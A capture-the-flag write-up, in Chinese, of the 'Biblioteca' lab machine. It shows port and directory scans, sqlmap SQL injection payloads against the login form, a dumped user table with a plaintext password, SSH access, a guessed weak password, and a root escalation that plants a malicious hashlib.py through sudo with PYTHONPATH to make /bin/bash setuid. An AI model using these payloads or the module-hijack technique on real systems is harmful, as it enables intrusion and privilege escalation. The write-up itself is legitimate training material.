Biblioteca
端口扫描
root@ip-10-10-166-251:~/biblioteca# nmap -sTCV -p 22,8000 --min-rate 1000 10.10.119.87
Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-04 05:08 BST
Nmap scan report for ip-10-10-119-87.eu-west-1.compute.internal (10.10.119.87)
Host is up (0.000094s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
8000/tcp open http Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10
|_http-title: Login
MAC Address: 02:1D:D3:84:80:9B (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
8000
root@ip-10-10-166-251:~/biblioteca# gobuster dir -u http://10.10.119.87:8000/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.119.87:8000/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,html
[+] Timeout: 10s
===============================================================
2023/10/04 05:09:21 Starting gobuster
===============================================================
/login (Status: 200)
/register (Status: 200)
/logout (Status: 302)
===============================================================
2023/10/04 05:25:30 Finished
===============================================================
根据扫描结果我访问网页并没有发现任何可以利用的地方, 因为这个网站只是简单的登陆, 所以我尝试 SQLi 并发现存在漏洞
root@ip-10-10-166-251:~/biblioteca# sqlmap -r sql.txt --risk 3 --level 3
---
Parameter: username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=admin' AND 5487=5487-- SjLu&password=admin
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: username=admin' AND SLEEP(5)-- YtoB&password=admin
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: username=-9392' UNION ALL SELECT NULL,CONCAT(0x71716a6271,0x556d77534f5855517a68686265624b4141734a694c7a4c774449496c71566346766b54787a4d6151,0x7170626271),NULL,NULL-- vjAb&password=admin
---
读取数据库中的用户表我得到了一个账号
Database: website
Table: users
[2 entries]
+----+-------------------+----------+----------------+
| id | email | username | password |
+----+-------------------+----------+----------------+
| 1 | [email protected] | smokey | My_P@ssW0rd123 |
| 2 | [email protected] | admin | admin | # 自己注册的
+----+-------------------+----------+----------------+
对于 smokey 账号我登陆网站并没有发现什么特殊之处所以尝试利用其进行 SSH 登陆
后渗透
smokey
利用得到的账号发现可以登录
smokey —>hazel
查看提示告诉我弱密码, 所以直接将用户名当作密码发现可以登录
hazel —> root
我发现用户具有 SUDO 特权可以执行一个 Python脚本同时还需要 SETENV 权限直接 Python PATH 提权
hazel@biblioteca:/home$ sudo -l
Matching Defaults entries for hazel on biblioteca:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hazel may run the following commands on biblioteca:
(root) SETENV: NOPASSWD: /usr/bin/python3 /home/hazel/hasher.py
hazel@biblioteca:/home$ cd ~
hazel@biblioteca:~$ ls
hasher.py user.txt
hazel@biblioteca:~$ ls -al hasher.py
-rw-r----- 1 root hazel 497 Dec 7 2021 hasher.py
hazel@biblioteca:~$ cat hasher.py | head -n 3
import hashlib
def hashing(passw):
hazel@biblioteca:~$ cat << EOF > /tmp/hashlib.py
> import os
> os.system("chmod u+s /bin/bash")
> EOF
hazel@biblioteca:~$ sudo PYTHONPATH=/tmp /usr/bin/python3 /home/hazel/hasher.py
....
hazel@biblioteca:~$ ls -al /bin/bash
-rwsr-xr-x 1 root root 1183448 Jun 18 2020 /bin/bash